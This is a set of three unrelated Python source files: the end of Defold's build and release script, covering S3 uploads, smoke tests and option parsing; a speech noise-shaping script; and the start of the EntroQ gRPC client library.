http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Defold Downloads</title> <link href='//fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//d.defold.com/static/bootstrap/css/bootstrap.min.css"> <style> body { padding-top: 50px; } .starter-template { padding: 40px 15px; text-align: center; } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container"> <a class="brand" href="/">Defold Downloads</a> <ul class="nav"> </ul> </div> </div> </div> <div class="container"> <div id="releases"></div> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script> <script src="//d.defold.com/static/bootstrap/js/bootstrap.min.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/mustache.js/0.7.2/mustache.min.js"></script> <script id="templ-releases" type="text/html"> <h2>{{release.channel}} {{release.version}}</h2> {{#release.editor}} <p> <a href="{{url}}" class="btn btn-primary" style="width: 20em;" role="button">Download for {{name}}</a> </p> {{/release.editor}} {{#has_releases}} <h2>Releases</h2> {{/has_releases}} {{#releases}} <div class="panel-group" id="accordion"> <div class="panel panel-default"> <div class="panel-heading"> <h4 class="panel-title"> <a data-toggle="collapse" data-parent="#accordion" href="#{{sha1}}"> <h3>{{tag}} <small>{{date}} ({{abbrevsha1}})</small></h3> </a> </h4> </div> <div id="{{sha1}}" class="panel-collapse collapse "> <div class="panel-body"> <table class="table table-striped"> <tbody> {{#files}} <tr><td><a href="{{path}}">{{name}}</a></td></tr> {{/files}} {{^files}} <i>No files</i> {{/files}} </tbody> </table> </div> </div> </div> </div> {{/releases}} </script> <script> var model = %(model)s var output = Mustache.render($('#templ-releases').html(), model); $("#releases").html(output); </script> </body> </html> """ if run.shell_command('git config -l').find('remote.origin.url') != -1 and os.environ.get('GITHUB_WORKFLOW', None) is None: # NOTE: Only run fetch when we have a configured remote branch. # When running on buildbot we don't but fetching should not be required either # as we're already up-to-date self._log('Running git fetch to get latest tags and refs...') run.shell_command('git fetch') u = urlparse.urlparse(self.get_archive_path()) hostname = u.hostname bucket = s3.get_bucket(hostname) model = {'releases': [], 'has_releases': False} if self.channel == 'stable': # Move artifacts to a separate page? model['releases'] = s3.get_tagged_releases(self.get_archive_path()) model['has_releases'] = True else: model['releases'] = s3.get_single_release(self.get_archive_path(), self.version, self._git_sha1()) model['has_releases'] = True if not model['releases']: raise Exception('Unable to find any releases') # NOTE # - The stable channel is based on the latest tag # - The beta and alpha channels are based on the latest # commit in their branches, i.e. origin/dev for alpha if self.channel == 'stable': release_sha1 = model['releases'][0]['sha1'] else: release_sha1 = self._git_sha1() if sys.stdin.isatty(): sys.stdout.write('Release %s with SHA1 %s to channel %s? [y/n]: ' % (self.version, release_sha1, self.channel)) response = sys.stdin.readline() if response[0] != 'y': return model['release'] = { 'channel': "Unknown", 'version': self.version } if self.channel: model['release']['channel'] = self.channel.capitalize() # We handle the stable channel seperately, since we want it to point # to the editor-dev release (which uses the latest stable engine). editor_channel = None if self.channel == "stable": editor_channel = "editor-alpha" else: editor_channel = self.channel or "stable" editor_archive_path = urlparse.urlparse(self.get_archive_path(editor_channel)).path editor_download_url = "https://%s%s/%s/%s/editor2/" % (hostname, editor_archive_path, release_sha1, editor_channel) model['release'] = {'editor': [ dict(name='macOS 10.11+', url=editor_download_url + 'Defold-x86_64-darwin.dmg'), dict(name='macOS 10.7-10.10', url=editor_download_url + 'Defold-x86_64-darwin.zip'), dict(name='Windows', url=editor_download_url + 'Defold-x86_64-win32.zip'), dict(name='Ubuntu 16.04+', url=editor_download_url + 'Defold-x86_64-linux.zip')] } # NOTE: We upload index.html to /CHANNEL/index.html # The root-index, /index.html, redirects to /stable/index.html self._log('Uploading %s/index.html' % self.channel) html = page % {'model': json.dumps(model)} key = bucket.new_key('%s/index.html' % self.channel) key.content_type = 'text/html' key.set_contents_from_string(html) self._log('Uploading %s/info.json' % self.channel) key = bucket.new_key('%s/info.json' % self.channel) key.content_type = 'application/json' key.set_contents_from_string(json.dumps({'version': self.version, 'sha1' : release_sha1})) # Editor update-v3.json key_v3 = bucket.new_key('editor2/channels/%s/update-v3.json' % self.channel) key_v3.content_type = 'application/json' self._log("Updating channel '%s' for update-v3.json: %s" % (self.channel, key_v3)) key_v3.set_contents_from_string(json.dumps({'sha1': release_sha1})) # Set redirect urls so the editor can always be downloaded without knowing the latest sha1. # Used by www.defold.com/download # For example; # redirect: /editor2/channels/editor-alpha/Defold-x86_64-darwin.dmg -> /archive/<sha1>/editor-alpha/Defold-x86_64-darwin.dmg for name in ['Defold-x86_64-darwin.dmg', 'Defold-x86_64-win32.zip', 'Defold-x86_64-linux.zip']: key_name = 'editor2/channels/%s/%s' % (editor_channel, name) redirect = '%s/%s/%s/editor2/%s' % (editor_archive_path, release_sha1, editor_channel, name) self._log('Creating link from %s -> %s' % (key_name, redirect)) key = bucket.new_key(key_name) key.set_redirect(redirect) # # END: RELEASE # ------------------------------------------------------------ def release_to_github(self): release_to_github.release(self) def release_to_github_markdown(self): release_to_github.release_markdown(self) def sync_archive(self): u = urlparse.urlparse(self.get_archive_path()) bucket_name = u.hostname bucket = s3.get_bucket(bucket_name) local_dir = os.path.join(self.dynamo_home, 'archive') self._mkdirs(local_dir) if not self.thread_pool: self.thread_pool = ThreadPool(8) def download(key, path): self._log('s3://%s/%s -> %s' % (bucket_name, key.name, path)) key.get_contents_to_filename(path) futures = [] sha1 = self._git_sha1() # Only s3 is supported (scp is deprecated) # The pattern is used to filter out: # * Editor files # * Defold SDK files # * launcher files, used to launch editor2 pattern = re.compile(r'(^|/)editor(2)*/|/defoldsdk\.zip$|/launcher(\.exe)*$') prefix = s3.get_archive_prefix(self.get_archive_path(), self._git_sha1()) for key in bucket.list(prefix = prefix): rel = os.path.relpath(key.name, prefix) if not pattern.search(rel): p = os.path.join(local_dir, sha1, rel) self._mkdirs(os.path.dirname(p)) f = Future(self.thread_pool, download, key, p) futures.append(f) for f in futures: f() # ------------------------------------------------------------ # BEGIN: SMOKE TEST # def _download_editor2(self, channel, sha1): bundles = { 'x86_64-darwin': 'Defold-x86_64-darwin.dmg', 'x86_64-linux' : 'Defold-x86_64-linux.zip', 'x86_64-win32' : 'Defold-x86_64-win32.zip' } host2 = get_host_platform2() bundle = bundles.get(host2) if bundle: url = join(self.get_archive_path(), sha1, channel, 'editor2', bundle).replace("s3", "https").replace("\\", "/") path = self._download(url) return path else: print("No editor2 bundle found for %s" % host2) return None def _install_editor2(self, path): host2 = get_host_platform2() install_path = join('tmp', 'smoke_test') if 'darwin' in host2: out = run.command(['hdiutil', 'attach', path]) print("cmd:" + out) last = [l2 for l2 in (l1.strip() for l1 in out.split('\n')) if l2][-1] words = last.split() fs = words[0] volume = words[-1] install_path = join(install_path, 'Defold.app') self._copy_tree(join(volume, 'Defold.app'), install_path) result = {'volume': volume, 'fs': fs, 'install_path': install_path, 'resources_path': join('Defold.app', 'Contents', 'Resources'), 'config': join(install_path, 'Contents', 'Resources', 'config')} return result else: if 'win32' in host2 or 'linux' in host2: self._extract_zip(path, install_path) else: self._extract(path, install_path) install_path = join(install_path, 'Defold') result = {'install_path': install_path, 'resources_path': 'Defold', 'config': join(install_path, 'config')} return result def _uninstall_editor2(self, info): host2 = get_host_platform2() shutil.rmtree(info['install_path']) if 'darwin' in host2: out = run.command(['hdiutil', 'detach', info['fs']]) def _get_config(self, config, section, option, overrides): combined = '%s.%s' % (section, option) if combined in overrides: return overrides[combined] if section == 'bootstrap' and option == 'resourcespath': return '.' v = config.get(section, option) m = re.search(r"\${(\w+).(\w+)}", v) while m: s = m.group(1) o = m.group(2) v = re.sub(r"\${(\w+).(\w+)}", self._get_config(config, s, o, overrides), v, 1) m = re.search(r"\${(\w+).(\w+)}", v) return v def smoke_test(self): sha1 = self._git_sha1() cwd = join('tmp', 'smoke_test') if os.path.exists(cwd): shutil.rmtree(cwd) path = self._download_editor2(self.channel, sha1) info = self._install_editor2(path) config = ConfigParser() config.read(info['config']) overrides = {'bootstrap.resourcespath': info['resources_path']} jdk = 'jdk11.0.1-p1' host2 = get_host_platform2() if 'win32' in host2: java = join('Defold', 'packages', jdk, 'bin', 'java.exe') elif 'linux' in host2: run.command(['chmod', '-R', '755', 'tmp/smoke_test/Defold']) java = join('Defold', 'packages', jdk, 'bin', 'java') else: java = join('Defold.app', 'Contents', 'Resources', 'packages', jdk, 'bin', 'java') jar = self._get_config(config, 'launcher', 'jar', overrides) vmargs = self._get_config(config, 'launcher', 'vmargs', overrides).split(',') + ['-Ddefold.log.dir=.', '-Ddefold.smoke.log=true'] vmargs = filter(lambda x: not str.startswith(x, '-Ddefold.update.url='), vmargs) main = self._get_config(config, 'launcher', 'main', overrides) game_project = '../../editor/test/resources/geometry_wars/game.project' args = [java, '-cp', jar] + vmargs + [main, '--preferences=../../editor/test/resources/smoke_test_prefs.json', game_project] robot_jar = '%s/ext/share/java/defold-robot.jar' % self.dynamo_home robot_args = [java, '-jar', robot_jar, '-s', '../../share/smoke-test.edn', '-o', 'result'] origdir = os.getcwd() origcwd = cwd if 'win32' in host2: os.chdir(cwd) cwd = '.' print('Running robot: %s' % robot_args) robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False) time.sleep(2) self._log('Running editor: %s' % args) ed_proc = subprocess.Popen(args, cwd = cwd, shell = False) os.chdir(origdir) cwd = origcwd output = robot_proc.communicate()[0] if ed_proc.poll() == None: ed_proc.terminate() ed_proc.wait() self._uninstall_editor2(info) result_archive_path = '/'.join(['int.d.defold.com', 'archive', sha1, self.channel, 'editor2', 'smoke_test']) def _findwebfiles(libdir): paths = os.listdir(libdir) paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.html', '.css', '.png')] return paths for f in _findwebfiles(join(cwd, 'result')): self.upload_to_s3(f, 's3://%s/%s' % (result_archive_path, basename(f))) self.wait_uploads() self._log('Log: https://s3-eu-west-1.amazonaws.com/%s/index.html' % (result_archive_path)) if robot_proc.returncode != 0: sys.exit(robot_proc.returncode) return True def local_smoke(self): host2 = get_host_platform2() cwd = './editor' if os.path.exists('editor/log.txt'): os.remove('editor/log.txt') game_project = 'test/resources/geometry_wars/game.project' args = ['./scripts/lein', 'with-profile', '+smoke-test', 'run', game_project] robot_jar = '../defold-robot/target/defold-robot-0.7.0-standalone.jar' robot_args = ['java', '-jar', robot_jar, '-s', '../share/smoke-test.edn', '-o', 'local_smoke_result'] origdir = os.getcwd() origcwd = cwd if 'win32' in host2: os.chdir(cwd) args = ['sh'] + args cwd = '.' print('Running robot: %s' % robot_args) robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False) time.sleep(2) self._log('Running editor: %s' % args) ed_proc = subprocess.Popen(args, cwd = cwd, shell = False) os.chdir(origdir) cwd = origcwd output = robot_proc.communicate()[0] if ed_proc.poll() == None: ed_proc.terminate() ed_proc.wait() if robot_proc.returncode != 0: sys.exit(robot_proc.returncode) return True # # END: SMOKE TEST # ------------------------------------------------------------ def get_archive_path(self, channel=None): return join(self.archive_path, channel or self.channel) def get_archive_redirect_key(self, url): old_url = url.replace(self.get_archive_path().replace("\\", "/"), self.archive_path) u = urlparse.urlparse(old_url) return u.path def download_from_archive(self, src_path, dst_file): url = join(self.get_archive_path(), src_path) self.download_from_s3(dst_file, url) def upload_to_archive(self, src_file, dst_path): url = join(self.get_archive_path(), dst_path).replace("\\", "/") self._log("Uploading %s -> %s" % (src_file, url)) self.upload_to_s3(src_file, url) # create redirect so that the old s3 paths still work # s3://d.defold.com/archive/channel/sha1/engine/* -> http://d.defold.com/archive/sha1/engine/* bucket = s3.get_bucket(urlparse.urlparse(url).netloc) redirect_key = self.get_archive_redirect_key(url) redirect_url = url.replace("s3://", "http://") key = bucket.new_key(redirect_key) key.set_redirect(redirect_url) self._log("Redirecting %s -> %s : %s" % (url, redirect_key, redirect_url)) def download_from_s3(self, path, url): url = url.replace('\\', '/') self._log('Downloading %s -> %s' % (url, path)) u = urlparse.urlparse(url) if u.scheme == 's3': self._mkdirs(os.path.dirname(path)) from boto.s3.key import Key bucket = s3.get_bucket(u.netloc) k = Key(bucket) k.key = u.path k.get_contents_to_filename(path) self._log('Downloaded %s -> %s' % (url, path)) else: raise Exception('Unsupported url %s' % (url)) def upload_to_s3(self, path, url): url = url.replace('\\', '/') self._log('Uploading %s -> %s' % (path, url)) u = urlparse.urlparse(url) if u.scheme == 's3': bucket = s3.get_bucket(u.netloc) if not self.thread_pool: self.thread_pool = ThreadPool(8) p = u.path if p[-1] == '/': p += basename(path) def upload_singlefile(): key = bucket.new_key(p) key.set_contents_from_filename(path) self._log('Uploaded %s -> %s' % (path, url)) def upload_multipart(): headers = {} contenttype, _ = mimetypes.guess_type(path) if contenttype is not None: headers['Content-Type'] = contenttype mp = bucket.initiate_multipart_upload(p, headers=headers) source_size = os.stat(path).st_size chunksize = 64 * 1024 * 1024 # 64 MiB chunkcount = int(math.ceil(source_size / float(chunksize))) def upload_part(filepath, part, offset, size): with open(filepath, 'r') as fhandle: fhandle.seek(offset) mp.upload_part_from_file(fp=fhandle, part_num=part, size=size) _threads = [] for i in range(chunkcount): part = i + 1 offset = i * chunksize remaining = source_size - offset size = min(chunksize, remaining) args = {'filepath': path, 'part': part, 'offset': offset, 'size': size} self._log('Uploading #%d %s -> %s' % (i + 1, path, url)) _thread = Thread(target=upload_part, kwargs=args) _threads.append(_thread) _thread.start() for i in range(chunkcount): _threads[i].join() self._log('Uploaded #%d %s -> %s' % (i + 1, path, url)) if len(mp.get_all_parts()) == chunkcount: mp.complete_upload() self._log('Uploaded %s -> %s' % (path, url)) else: mp.cancel_upload() self._log('Failed to upload %s -> %s' % (path, url)) f = None if sys.platform == 'win32': f = Future(self.thread_pool, upload_singlefile) else: f = Future(self.thread_pool, upload_multipart) self.futures.append(f) else: raise Exception('Unsupported url %s' % (url)) def wait_uploads(self): for f in self.futures: f() self.futures = [] def _form_env(self): env = dict(os.environ) host = self.host2 if 'x86-' in host: host = self.host ld_library_path = 'DYLD_LIBRARY_PATH' if self.host == 'darwin' else 'LD_LIBRARY_PATH' ld_library_paths = ['%s/lib/%s' % (self.dynamo_home, self.target_platform), '%s/ext/lib/%s' % (self.dynamo_home, self.host)] if self.host == 'x86_64-linux': ld_library_paths.append('%s/ext/SDKs/linux/%s/%s/lib' % (self.dynamo_home, PACKAGES_LINUX_CLANG, PACKAGES_TAPI_VERSION)) env[ld_library_path] = os.path.pathsep.join(ld_library_paths) pythonpaths = ['%s/lib/python' % self.dynamo_home, '%s/build_tools' % self.defold, '%s/ext/lib/python' % self.dynamo_home] env['PYTHONPATH'] = os.path.pathsep.join(pythonpaths) env['DYNAMO_HOME'] = self.dynamo_home env['ANDROID_HOME'] = os.path.join(self.dynamo_home, 'ext', 'SDKs', 'android-sdk') go_root = '%s/ext/go/%s/go' % (self.dynamo_home, self.target_platform) android_host = self.host if 'win32' in android_host: android_host = 'windows' paths = os.path.pathsep.join(['%s/bin/%s' % (self.dynamo_home, self.target_platform), '%s/bin' % (self.dynamo_home), '%s/ext/bin' % self.dynamo_home, '%s/ext/bin/%s' % (self.dynamo_home, host), '%s/bin' % go_root, '%s/platform-tools' % env['ANDROID_HOME'], '%s/ext/SDKs/%s/toolchains/llvm/prebuilt/%s-x86_64/bin' % (self.dynamo_home,PACKAGES_ANDROID_NDK,android_host)]) env['PATH'] = paths + os.path.pathsep + env['PATH'] go_paths = os.path.pathsep.join(['%s/go' % self.dynamo_home, join(self.defold, 'go')]) env['GOPATH'] = go_paths env['GOROOT'] = go_root env['MAVEN_OPTS'] = '-Xms256m -Xmx700m -XX:MaxPermSize=1024m' # Force 32-bit python 2.7 on darwin. env['VERSIONER_PYTHON_PREFER_32_BIT'] = 'yes' env['VERSIONER_PYTHON_VERSION'] = '2.7' if self.no_colors: env['NOCOLOR'] = '1' env['EMSCRIPTEN'] = self._form_ems_path() env['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache') env['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten') xhr2_path = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR, 'xhr2', 'package', 'lib') if 'NODE_PATH' in env: env['NODE_PATH'] = xhr2_path + os.path.pathsep + env['NODE_PATH'] else: env['NODE_PATH'] = xhr2_path return env if __name__ == '__main__': boto_path = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../packages/boto-2.28.0-py2.7.egg')) sys.path.insert(0, boto_path) usage = '''usage: %prog [options] command(s) Commands: distclean - Removes the DYNAMO_HOME folder install_ext - Install external packages install_ems - Install emscripten sdk sync_archive - Sync engine artifacts from S3 activate_ems - Used when changing to a branch that uses a different version of emscripten SDK (resets ~/.emscripten) build_engine - Build engine archive_engine - Archive engine (including builtins) to path specified with --archive-path install_go - Install go dev tools build_go - Build go code archive_go - Archive go binaries build_editor2 - Build editor sign_editor2 - Sign editor bundle_editor2 - Bundle editor (zip) archive_editor2 - Archive editor to path specified with --archive-path download_editor2 - Download editor bundle (zip) notarize_editor2 - Notarize the macOS version of the editor build_bob - Build bob with native libraries included for cross platform deployment archive_bob - Archive bob to path specified with --archive-path build_docs - Build documentation build_builtins - Build builtin content archive bump - Bump version number release - Release editor shell - Start development shell smoke_test - Test editor and engine in combination local_smoke - Test run smoke test using local dev environment Multiple commands can be specified To pass on arbitrary options to waf: build.py OPTIONS COMMANDS -- WAF_OPTIONS ''' parser = optparse.OptionParser(usage) parser.add_option('--platform', dest='target_platform', default = None, choices = get_target_platforms(), help = 'Target platform') parser.add_option('--skip-tests', dest='skip_tests', action = 'store_true', default = False, help = 'Skip unit-tests. Default is false') parser.add_option('--skip-codesign', dest='skip_codesign', action = 'store_true', default = False, help = 'skip code signing (engine and editor). Default is false') parser.add_option('--skip-docs', dest='skip_docs', action = 'store_true', default = False, help = 'skip building docs when building the engine. Default is false') parser.add_option('--skip-builtins', dest='skip_builtins', action = 'store_true', default = False, help = 'skip building builtins when building the engine. Default is false') parser.add_option('--skip-bob-light', dest='skip_bob_light', action = 'store_true', default = False, help = 'skip building bob-light when building the engine. Default is false') parser.add_option('--disable-ccache', dest='disable_ccache', action = 'store_true', default = False, help = 'force disable of ccache. Default is false') parser.add_option('--no-colors', dest='no_colors', action = 'store_true', default = False, help = 'No color output. Default is color output') default_archive_path = CDN_UPLOAD_URL parser.add_option('--archive-path', dest='archive_path', default = default_archive_path, help = 'Archive build. Set ssh-path, host:path, to archive build to. Default is %s' % default_archive_path) default_package_path = CDN_PACKAGES_URL parser.add_option('--package-path', dest='package_path', default = default_package_path, help = 'Either an url to a file server where the sdk packages are located, or a path to a local folder. Reads $DM_PACKAGES_URL. Default is %s.' % default_package_path) parser.add_option('--set-version', dest='set_version', default = None, help = 'Set version explicitily when bumping version') parser.add_option('--channel', dest='channel', default = None, help = 'Editor release channel (stable, beta, ...)') parser.add_option('--engine-artifacts', dest='engine_artifacts', default = 'auto', help = 'What engine version to bundle the Editor with (auto, dynamo-home, archived, archived-stable or a SHA1)') parser.add_option('--save-env-path', dest='save_env_path', default = None, help = 'Save environment variables to a file') parser.add_option('--notarization-username', dest='notarization_username', default = None, help = 'Username to use when sending the editor for notarization') parser.add_option('--notarization-password', dest='notarization_password', default = None, help = 'Password to use when sending the editor for notarization') parser.add_option('--notarization-itc-provider', dest='notarization_itc_provider', default = None, help = 'Optional iTunes Connect provider to use when sending the editor for notarization') parser.add_option('--github-token', dest='github_token', default = None, help = 'GitHub authentication token when releasing to GitHub') parser.add_option('--github-target-repo', dest='github_target_repo', default = release_to_github.get_default_repo(), help = 'GitHub target repo when releasing artefacts') parser.add_option('--github-sha1', dest='github_sha1', default = None, help = 'A specific sha1 to use in github operations') parser.add_option('--version', dest='version', default = None, help = 'Version to use instead of from VERSION file') parser.add_option('--codesigning-identity', dest='codesigning_identity', default = None, help = 'Codesigning identity for macOS version of the editor') parser.add_option('--windows-cert', dest='windows_cert', default = None, help = 'Path to codesigning certificate for Windows version of the editor') parser.add_option('--windows-cert-pass', dest='windows_cert_pass', default = None, help = 'Path to file containing password to codesigning certificate for Windows version of the editor') options, all_args = parser.parse_args() args = filter(lambda x: x[:2] != '--', all_args) waf_options = filter(lambda x: x[:2] == '--', all_args) if len(args) == 0: parser.error('No command specified') target_platform = options.target_platform if not options.target_platform: target_platform = get_host_platform2() if 'x86-' in target_platform: target_platform = get_host_platform() # we need even more cleanup to use "x86-linux" format for everything c = Configuration(dynamo_home = os.environ.get('DYNAMO_HOME', None), target_platform = target_platform, skip_tests = options.skip_tests, skip_codesign = options.skip_codesign, skip_docs = options.skip_docs, skip_builtins = options.skip_builtins, skip_bob_light = options.skip_bob_light, disable_ccache = options.disable_ccache, no_colors = options.no_colors, archive_path = options.archive_path, package_path = options.package_path, set_version = options.set_version, channel = options.channel, engine_artifacts = options.engine_artifacts, waf_options = waf_options, save_env_path = options.save_env_path, notarization_username = options.notarization_username, notarization_password = options.notarization_password, notarization_itc_provider = options.notarization_itc_provider, github_token = options.github_token, github_target_repo = options.github_target_repo, github_sha1 = options.github_sha1, version = options.version, codesigning_identity = options.codesigning_identity, windows_cert = options.windows_cert, windows_cert_pass = options.windows_cert_pass) for cmd in args: f = getattr(c, cmd, None) if not f: parser.error('Unknown command %s' % cmd) else: start = time.time() print("Running '%s'" % cmd) f() c.wait_uploads() duration = (time.time() - start) print("'%s' completed in %.2f s" % (cmd, duration)) print('Done')
noise_restored.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright 2019 Wu Yi-Chiao (Nagoya University) # based on a WaveNet script by Tomoki Hayashi (Nagoya University) # (https://github.com/kan-bayashi/PytorchWaveNetVocoder) # Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) from __future__ import division import argparse import logging import multiprocessing as mp import os import sys from distutils.util import strtobool import numpy as np from scipy.io import wavfile from sprocket.speech.feature_extractor import FeatureExtractor from sprocket.speech.synthesizer import Synthesizer from feature_extract import low_cut_filter from utils import find_files, read_hdf5, read_txt, check_hdf5 def _get_arguments(): parser = argparse.ArgumentParser() # path setting parser.add_argument("--feats", required=True, type=str, help="list or directory of aux feat files") parser.add_argument("--stats", required=True, type=str, help="hdf5 file including statistics") parser.add_argument("--outdir", required=True, type=str, help="directory of noise shaped wav files") parser.add_argument("--writedir", required=True, type=str, help="directory to save restored wav file") # feature setting parser.add_argument("--feature_type", default="world", type=str, help="feature type") parser.add_argument("--feature_format", default="h5", type=str, help="feature format") parser.add_argument("--pow_adjust", default="1.0", type=float, help="power adjust factor") parser.add_argument("--fs", default=16000, type=int, help="Sampling frequency") parser.add_argument("--shiftms", default=5, type=float, help="Frame shift in msec") parser.add_argument("--fftl", default=1024, type=int, help="FFT length") parser.add_argument("--mcep_dim_start", default=2, type=int, help="Start index of mel cepstrum") parser.add_argument("--mcep_dim_end", default=27, type=int, help="End index of mel cepstrum") parser.add_argument("--mcep_alpha", default=0.41, type=float, help="Alpha of mel cepstrum") parser.add_argument("--mag", default=0.5, type=float, help="magnification of noise shaping") # other setting parser.add_argument("--verbose", default=1, type=int, help="log message level") parser.add_argument('--n_jobs', default=40, type=int, help="number of parallel jobs") parser.add_argument('--inv', default=False, type=strtobool, help="if True, inverse filtering will be performed") return parser.parse_args() def noise_shaping(wav_list, args): """APPLY NOISE SHAPING""" # define feature extractor feature_extractor = FeatureExtractor( analyzer="world", fs=args.fs, shiftms=args.shiftms, fftl=args.fftl) # define synthesizer synthesizer = Synthesizer( fs=args.fs, shiftms=args.shiftms, fftl=args.fftl) for i, feat_id in enumerate(wav_list): logging.info("now processing %s (%d/%d)" % (feat_id, i + 1, len(wav_list))) # load wavfile and apply low cut filter wav_filename = args.outdir.replace("feat_id", feat_id) fs, x = wavfile.read(wav_filename) wav_type = x.dtype x = np.array(x, dtype=np.float64) # check sampling frequency if not fs == args.fs: logging.error("sampling frequency is not matched.") sys.exit(1) ## extract features (only for get the number of frames) f0, _, _ = feature_extractor.analyze(x) num_frames = f0.shape[0] # load average mcep mlsa_coef = read_hdf5(args.stats, "/%s/mean" % args.feature_type) mlsa_coef = mlsa_coef[args.mcep_dim_start:args.mcep_dim_end] * args.mag mlsa_coef[0] = 0.0 if args.inv: mlsa_coef[1:] = -1.0 * mlsa_coef[1:] mlsa_coef = np.tile(mlsa_coef, [num_frames, 1]) # synthesis and write x_ns = synthesizer.synthesis_diff(x, mlsa_coef, alpha=args.mcep_alpha) x_ns = low_cut_filter(x_ns, args.fs, cutoff=70) write_name = args.writedir.replace("feat_id", feat_id) # check directory existence wav = np.clip(x_ns, -32768, 32767) if wav_type == np.int16: wavfile.write(write_name, args.fs, np.int16(wav)) else: wavfile.write(write_name, args.fs, wav) def main(): # parser arguments args = _get_arguments() # set log level if args.verbose == 1: logging.basicConfig(level=logging.INFO, format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s', datefmt='%m/%d/%Y %I:%M:%S') elif args.verbose > 1: logging.basicConfig(level=logging.DEBUG, format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s', datefmt='%m/%d/%Y %I:%M:%S') else: logging.basicConfig(level=logging.WARN, format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s', datefmt='%m/%d/%Y %I:%M:%S') logging.warn("logging is disabled.") # show argmument for key, value in vars(args).items(): logging.info("%s = %s" % (key, str(value))) # check directory existence if not os.path.exists(os.path.dirname(args.writedir)): os.makedirs(os.path.dirname(args.writedir)) # get file list if os.path.isdir(args.feats): feat_list = sorted(find_files(args.feats, "*.%s" % args.feature_format)) elif os.path.isfile(args.feats): feat_list = read_txt(args.feats) else: logging.error("--feats should be directory or list.") sys.exit(1) feat_ids = [os.path.basename(f).replace(".%s" % args.feature_format, "") for f in feat_list] logging.info("number of utterances = %d" % len(feat_ids)) # divie list feat_ids = np.array_split(feat_ids, args.n_jobs) feat_ids = [f_ids.tolist() for f_ids in feat_ids] # multi processing processes = [] # for f in file_lists: for f in feat_ids: p = mp.Process(target=noise_shaping, args=(f, args,)) p.start() processes.append(p) # wait for all process for p in processes: p.join() if __name__ == "__main__": main()
__init__.py
"""Package entroq provides a client library for working with EntroQ. """ import base64 import json import threading import time import uuid import grpc from google.protobuf import json_format from grpc_health.v1 import health_pb2 from grpc_health.v1 import health_pb2_grpc from grpc_status import rpc_status from . import entroq_pb2 from . import entroq_pb2_grpc def is_cancelled(exc): return exc.cancelled() def is_dependency(exc): return exc.code() == grpc.StatusCode.NOT_FOUND def dependency_error_details(exc, as_json=False): if not is_dependency(exc): return None # Should have dependency metadata. meta = exc.trailing_metadata() if not meta: return None status = rpc_status.from_call(exc) details = [] for d in status.details: if not d.type_url.endswith('/proto.ModifyDep'): return None dep = entroq_pb2.ModifyDep() dep.ParseFromString(d.value) if dep.type == entroq_pb2.DETAIL and not dep.msg: continue if as_json: details.append(json_format.MessageToDict(dep)) else: details.append(dep) return details def id_str(task_id): return '{}:{}'.format(task_id.id, task_id.version) def as_change(task): return entroq_pb2.TaskChange( old_id=as_id(task), new_data=entroq_pb2.TaskData( queue=task.queue, at_ms=task.at_ms, value=task.value ) ) def as_id(task): return entroq_pb2.TaskID(id=task.id, version=task.version) class DependencyError(Exception): @classmethod def from_exc(cls, exc): deps = dependency_error_details(exc) if not deps: return exc self = cls.from_deps(deps) self.exc = exc return self @classmethod def from_deps(cls, deps): self = cls() for d in deps: if d.type == entroq_pb2.CLAIM: self.claims.append(id_str(d.id)) elif d.type == entroq_pb2.DELETE: self.deletes.append(id_str(d.id)) elif d.type == entroq_pb2.CHANGE: self.changes.append(id_str(d.id)) elif d.type == entroq_pb2.DEPEND: self.depends.append(id_str(d.id)) elif d.type == entroq_pb2.DETAIL: self.msg = d.msg elif d.type == entroq_pb2.INSERT: self.inserts.append(id_str(d.id)) return self def __init__(self): self.claims = [] self.deletes = [] self.changes = [] self.depends = [] self.inserts = [] self.msg = '' def as_json(self): return json.dumps(self.as_dict()) def as_dict(self): result = {} if self.claims: result['claims'] = self.claims if self.deletes: result['deletes'] = self.deletes if self.changes: result['changes'] = self.changes if self.depends: result['depends'] = self.depends if self.msg: result['msg'] = self.msg if self.inserts: result['inserts'] = self.inserts return result __str__ = as_json class EntroQ: """Client class for EntroQ over gRPC.""" def __init__(self, eqaddr='localhost:37706'): """Create an EntroQ client (over gRPC). Args: eqaddr: Hostport of the address of an EntroQ gRPC service. """ self.addr = eqaddr self.claimant_id = str(uuid.uuid4()) # TODO: allow secure channels. self.channel = grpc.insecure_channel(self.addr) self.stub = entroq_pb2_grpc.EntroQStub(self.channel) self.health_stub = health_pb2_grpc.HealthStub(self.channel) # Call the server, see what time it thinks it is, calculate rough skew. now = int(time.time() * 1000) self.time_skew = self.time() - now @staticmethod def to_dict(task, value_type=''): if value_type and value_type.lower() == 'json': jt = json_format.MessageToDict(task) val = jt.get('value') if val: jt['value'] = json.loads(base64.b64decode(val).decode('utf-8')) return jt return json_format.MessageToDict(task) def queues(self, prefixmatches=(), exactmatches=(), limit=0): """Return information about each queue that meets any of the given match criteria. If both prefixmatches and exactmatches is empty, then every queue matches. If only one is empty, it is simply ignored. The OR of all match specs is used to find queue names. Args: prefixmatches: iterable of allowed prefixes. exactmatches: iterable of allowed exact matches. limit: return no more than this many matches, all if 0. Returns: [entroq_pb2.QueueStats] """ resp = self.stub.QueueStats(entroq_pb2.QueuesRequest( match_prefix=prefixmatches, match_exact=exactmatches, limit=limit)) return resp.queues def queue_empty(self, queue): """Indicate whether the given queue is empty.""" qs = self.queues(exactmatches=[queue]) for qstat in qs: if qstat.name == queue: return qstat.num_tasks == 0 return True 